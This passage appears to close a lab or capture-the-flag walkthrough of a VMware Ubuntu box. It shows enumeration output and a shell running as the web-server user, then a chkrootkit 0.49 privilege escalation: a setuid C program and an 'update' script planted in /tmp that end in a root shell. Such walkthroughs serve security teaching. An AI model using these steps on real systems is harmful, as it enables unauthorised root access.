                    root       277  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:23]
                    root       278  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:24]
                    root       279  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:25]
                    root       280  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:26]
                    root       281  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:27]
                    root       282  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:28]
                    root       283  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:29]
                    root       284  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:30]
                    root       285  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:31]
                    root       286  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_32]
                    root       287  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:32]
                    root       379  0.0  0.0      0     0 ?        S    09:41   0:00 [jbd2/sda1-8]
                    root       380  0.0  0.0      0     0 ?        S<   09:41   0:00 [ext4-rsv-conver]
                    root       381  0.0  0.0      0     0 ?        S<   09:41   0:00 [ext4-unrsv-conv]
                    root       469  0.0  0.0   2832   608 ?        S    09:41   0:00 upstart-udev-bridge --daemon
                    root       471  0.0  0.1   3080  1296 ?        Ss   09:41   0:00 /sbin/udevd --daemon
                    102        547  0.0  0.0   3256   652 ?        Ss   09:41   0:00 dbus-daemon --system --fork --activation=upstart
                    syslog     557  0.1  0.1  30036  1472 ?        Sl   09:41   0:00 rsyslogd -c5
                    root       622  0.0  0.0   3020   812 ?        S    09:41   0:00 /sbin/udevd --daemon
                    root       623  0.0  0.0   3020   812 ?        S    09:41   0:00 /sbin/udevd --daemon
                    root       642  0.0  0.0      0     0 ?        S<   09:41   0:00 [ttm_swap]
                    root       706  0.0  0.0      0     0 ?        S<   09:41   0:00 [kpsmoused]
                    root       752  0.0  0.0   2844   348 ?        S    09:41   0:00 upstart-socket-bridge --daemon
                    root       797  0.0  0.0   2924   404 ?        Ss   09:41   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
                    root       819  0.0  0.2   6680  2400 ?        Ss   09:41   0:00 /usr/sbin/sshd -D
                    root       899  0.0  0.0   4628   840 tty4     Ss+  09:41   0:00 /sbin/getty -8 38400 tty4
                    root       903  0.0  0.0   4628   836 tty5     Ss+  09:41   0:00 /sbin/getty -8 38400 tty5
                    root       907  0.0  0.0   4628   844 tty2     Ss+  09:41   0:00 /sbin/getty -8 38400 tty2
                    root       908  0.0  0.0   4628   832 tty3     Ss+  09:41   0:00 /sbin/getty -8 38400 tty3
                    root       912  0.0  0.0   4628   836 tty6     Ss+  09:41   0:00 /sbin/getty -8 38400 tty6
                    root       920  0.0  0.0   2616   884 ?        Ss   09:41   0:00 cron
                    daemon     921  0.0  0.0   2468   348 ?        Ss   09:41   0:00 atd
                    www-data   966  0.0  0.2   8272  2236 ?        S    09:41   0:00 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
                    www-data   968  0.0  0.4  17844  4720 ?        Ss   09:41   0:00 /usr/bin/php-cgi
                    www-data   982  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
                    www-data   983  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
                    www-data   984  0.0  0.2  18100  3072 ?        S    09:41   0:00 /usr/bin/php-cgi
                    www-data   985  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
                    root      1003  0.0  0.0   4628   836 tty1     Ss+  09:41   0:00 /sbin/getty -8 38400 tty1
                    root      1187  0.0  0.0  22584   564 ?        Ssl  09:41   0:00 /usr/sbin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
                    root      1206  0.1  0.5  11268  5660 ?        S    09:41   0:00 /usr/sbin/vmtoolsd
                    root      1230  0.0  0.7  14736  7840 ?        S    09:41   0:00 /usr/lib/vmware-vgauth/VGAuthService -s
                    www-data  1243  0.0  0.0   2232   544 ?        S    09:41   0:00 sh -c uname -a; w; id; /bin/bash -i
                    www-data  1247  0.0  0.1   3448  1708 ?        S    09:41   0:00 /bin/bash -i
                    www-data  3185  0.2  0.1   3412  1428 ?        S    09:43   0:00 /bin/bash ./1.sh
                    www-data  3467  0.0  0.0   3384   644 ?        S    09:43   0:00 /bin/bash ./1.sh
                    www-data  3468  0.0  0.1   2860  1032 ?        R    09:43   0:00 ps aux


                    Process binaries & associated permissions (from above list):
                    -rwxr-xr-x 1 root root 920788 Mar 28  2013 /bin/bash
                    -rwxr-xr-x 2 root root  26696 Mar 29  2012 /sbin/getty
                    -rwxr-xr-x 1 root root 194528 Jan 18  2013 /sbin/init
                    -rwxr-xr-x 1 root root 177552 Jul 19  2013 /sbin/udevd
                    lrwxrwxrwx 1 root root     25 Apr 12  2016 /usr/bin/php-cgi -> /etc/alternatives/php-cgi
                    lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
                    -rwxr-xr-x 1 root root 187332 Dec 20  2011 /usr/sbin/lighttpd
                    -rwxr-xr-x 1 root root 531776 Jan 13  2016 /usr/sbin/sshd
                    lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
                    lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/sbin/vmware-vmblock-fuse -> /usr/lib/vmware-tools/bin32/appLoader


                    /etc/init.d/ binary permissions:
                    total 144
                    drwxr-xr-x  2 root root 4096 Apr 12  2016 .
                    drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root    0 Mar 30  2016 .legacy-bootordering
                    -rw-r--r--  1 root root 2427 Jul 26  2012 README
                    -rwxr-xr-x  1 root root 4596 Sep 25  2012 apparmor
                    lrwxrwxrwx  1 root root   21 Oct 25  2011 atd -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 2444 Jul 26  2012 bootlogd
                    lrwxrwxrwx  1 root root   21 Apr 19  2012 console-setup -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jun 19  2012 cron -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jun 13  2013 dbus -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Nov 26  2013 dmesg -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 1242 Dec 13  2011 dns-clean
                    lrwxrwxrwx  1 root root   21 Mar 14  2012 friendly-recovery -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 1105 Dec 15  2015 grub-common
                    -rwxr-xr-x  1 root root 1329 Jul 26  2012 halt
                    lrwxrwxrwx  1 root root   21 May 26  2011 hostname -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Mar 29  2012 hwclock -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Mar 29  2012 hwclock-save -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Feb  3  2012 irqbalance -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 1293 Jul 26  2012 killprocs
                    -rwxr-xr-x  1 root root 2545 Aug 19  2010 lighttpd
                    lrwxrwxrwx  1 root root   21 Nov 20  2011 module-init-tools -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface-container -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface-security -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 2797 Feb 13  2012 networking
                    -rwxr-xr-x  1 root root  882 Jul 26  2012 ondemand
                    lrwxrwxrwx  1 root root   21 Sep 12  2012 passwd -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-log -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-ready -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-splash -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-stop -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-upstart-bridge -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root  561 Feb  4  2011 pppd-dns
                    lrwxrwxrwx  1 root root   21 Oct 28  2013 procps -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 8635 Jul 26  2012 rc
                    -rwxr-xr-x  1 root root  801 Jul 26  2012 rc.local
                    -rwxr-xr-x  1 root root  117 Jul 26  2012 rcS
                    -rwxr-xr-x  1 root root  639 Jul 26  2012 reboot
                    lrwxrwxrwx  1 root root   21 Sep  8  2012 resolvconf -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 4395 Nov  8  2011 rsync
                    lrwxrwxrwx  1 root root   21 Nov 26  2013 rsyslog -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 4321 Jul 26  2012 sendsigs
                    lrwxrwxrwx  1 root root   21 Apr 19  2012 setvtrgb -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root  590 Jul 26  2012 single
                    -rw-r--r--  1 root root 4304 Jul 26  2012 skeleton
                    -rwxr-xr-x  1 root root 4371 Jan 13  2016 ssh
                    -rwxr-xr-x  1 root root  567 Jul 26  2012 stop-bootlogd
                    -rwxr-xr-x  1 root root 1143 Jul 26  2012 stop-bootlogd-single
                    -rwxr-xr-x  1 root root  700 May 23  2012 sudo
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udev -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udev-fallback-graphics -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udev-finish -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udevmonitor -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Jul 19  2013 udevtrigger -> /lib/init/upstart-job
                    lrwxrwxrwx  1 root root   21 Apr  5  2012 ufw -> /lib/init/upstart-job
                    -rwxr-xr-x  1 root root 2800 Jul 26  2012 umountfs
                    -rwxr-xr-x  1 root root 2211 Jul 26  2012 umountnfs.sh
                    -rwxr-xr-x  1 root root 2926 Jul 26  2012 umountroot
                    -rwxr-xr-x  1 root root 1985 Jul 26  2012 urandom


                    ### SOFTWARE #############################################
                    Sudo version:
                    Sudo version 1.8.3p1


                    ### INTERESTING FILES ####################################
                    Useful file locations:
                    /bin/nc
                    /bin/netcat
                    /usr/bin/wget
                    /usr/bin/gcc


                    Installed compilers:
                    ii  gcc                             4:4.6.3-1ubuntu5                  GNU C compiler
                    ii  gcc-4.6                         4.6.3-1ubuntu5                    GNU C compiler


                    Can we read/write sensitive files:
                    -rw-r--r-- 1 root root 953 Apr 12  2016 /etc/passwd
                    -rw-r--r-- 1 root root 620 Mar 30  2016 /etc/group
                    -rw-r--r-- 1 root root 665 Mar 30  2016 /etc/profile
                    -rw-r----- 1 root shadow 810 Apr 25  2016 /etc/shadow


                    Can't search *.conf files as no keyword was entered

                    Can't search *.log files as no keyword was entered

                    Can't search *.ini files as no keyword was entered

                    All *.conf files in /etc (recursive 1 level):
                    -rw-r--r-- 1 root root 604 Oct 19  2011 /etc/deluser.conf
                    -rw-r--r-- 1 root root 350 Mar 30  2016 /etc/popularity-contest.conf
                    -rw-r--r-- 1 root root 552 Feb  8  2012 /etc/pam.conf
                    -rw-r--r-- 1 root root 144 Mar 30  2016 /etc/kernel-img.conf
                    -rw-r--r-- 1 root root 1260 May  2  2011 /etc/ucf.conf
                    -rw-r--r-- 1 root root 3343 Sep 30  2013 /etc/gai.conf
                    -rw-r--r-- 1 root root 92 Apr 19  2012 /etc/host.conf
                    -rw-r--r-- 1 root root 321 Mar 29  2012 /etc/blkid.conf
                    -rw-r--r-- 1 root root 475 Apr 19  2012 /etc/nsswitch.conf
                    -rw-r--r-- 1 root root 2083 Oct 16  2013 /etc/sysctl.conf
                    -rw-r--r-- 1 root root 1263 Sep  5  2013 /etc/rsyslog.conf
                    -rw-r--r-- 1 root root 4728 May  2  2012 /etc/hdparm.conf
                    -rw-r----- 1 root fuse 216 Oct 18  2011 /etc/fuse.conf
                    -rw-r--r-- 1 root root 56 Apr 12  2016 /etc/chkrootkit.conf
                    -rw-r--r-- 1 root root 2981 Mar 30  2016 /etc/adduser.conf
                    -rw-r--r-- 1 root root 6961 Mar 30  2016 /etc/ca-certificates.conf
                    -rw-r--r-- 1 root root 956 Mar 30  2012 /etc/mke2fs.conf
                    -rw-r--r-- 1 root root 333 Mar 30  2016 /etc/updatedb.conf
                    -rw-r--r-- 1 root root 599 Oct  4  2011 /etc/logrotate.conf
                    -rw-r--r-- 1 root root 2969 Mar 15  2012 /etc/debconf.conf
                    -rw-r--r-- 1 root root 15752 Jul 25  2009 /etc/ltrace.conf
                    -rw-r--r-- 1 root root 34 Mar 30  2016 /etc/ld.so.conf
                    -rw-r--r-- 1 root root 839 Apr  9  2012 /etc/insserv.conf


                    Any interesting mail in /var/mail:
                    total 8
                    drwxrwsr-x  2 root mail 4096 Mar 30  2016 .
                    drwxr-xr-x 12 root root 4096 Apr 26  2016 ..


                    ### SCAN COMPLETE ####################################
                    www-data@ubuntu:/tmp$


                    dpkg -l | grep chkrootkit
                    rc  chkrootkit                      0.49-4ubuntu1.1                   rootkit detector

                    echo 'int main(void)' > test.c
                    echo '{ ' >> test.c
                    echo 'setgid(0);' >> test.c
                    echo 'setuid(0);' >> test.c
                    echo 'execl("/bin/sh", "sh", 0);' >> test.c
                    echo '}' >> test.c

                    echo '#!/bin/bash' > update
                    echo 'chown root /tmp/test' >> update
                    echo 'chgrp root /tmp/test' >> update
                    echo 'chmod u+s /tmp/test' >> update

                    gcc test.c -o test
                    gcc test.c -o test
                    test.c: In function 'main':
                    test.c:5:1: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
                    test.c:5:1: warning: missing sentinel in function call [-Wformat]

                    www-data@ubuntu:/tmp$ run-parts

                    drwxr-xr-x 22 root     root      4096 Mar 30  2016 ..
                    -rwxr-xr-x  1 www-data www-data 40155 Jan  5 09:42 1.sh
                    -rw-r--r--  1 www-data www-data 40155 Jan  5 09:43 2.py
                    -rw-r--r--  1 www-data www-data 36801 Jan  5 09:43 3.sh
                    -rw-r--r--  1 www-data www-data  5123 Jan  5 09:48 37292.c
                    drwxrwxrwt  2 root     root      4096 Jan  5 09:41 VMwareDnD
                    srwxr-xr-x  1 www-data www-data     0 Jan  5 09:41 php.socket-0
                    -rwsrwxrwx  1 root     root      7235 Jan  5 09:59 test
                    -rw-rw-rw-  1 www-data www-data    69 Jan  5 09:56 test.c
                    -rw-rw-rw-  1 www-data www-data     2 Jan  5 09:55 test.cls
                    -rwxrwxrwx  1 www-data www-data    74 Jan  5 09:57 update
                    -rw-rw-rw-  1 www-data www-data    20 Jan  5 09:56 updatels
                    -rw-r--r--  1 root     root      1600 Jan  5 09:41 vgauthsvclog.txt.0
                    drwx------  2 root     root      4096 Jan  5 09:41 vmware-root

                    www-data@ubuntu:/tmp$ ./test
                    ./test
                    whoami
                    root


                    Regards,
                    Yuriy Stanchev/URIX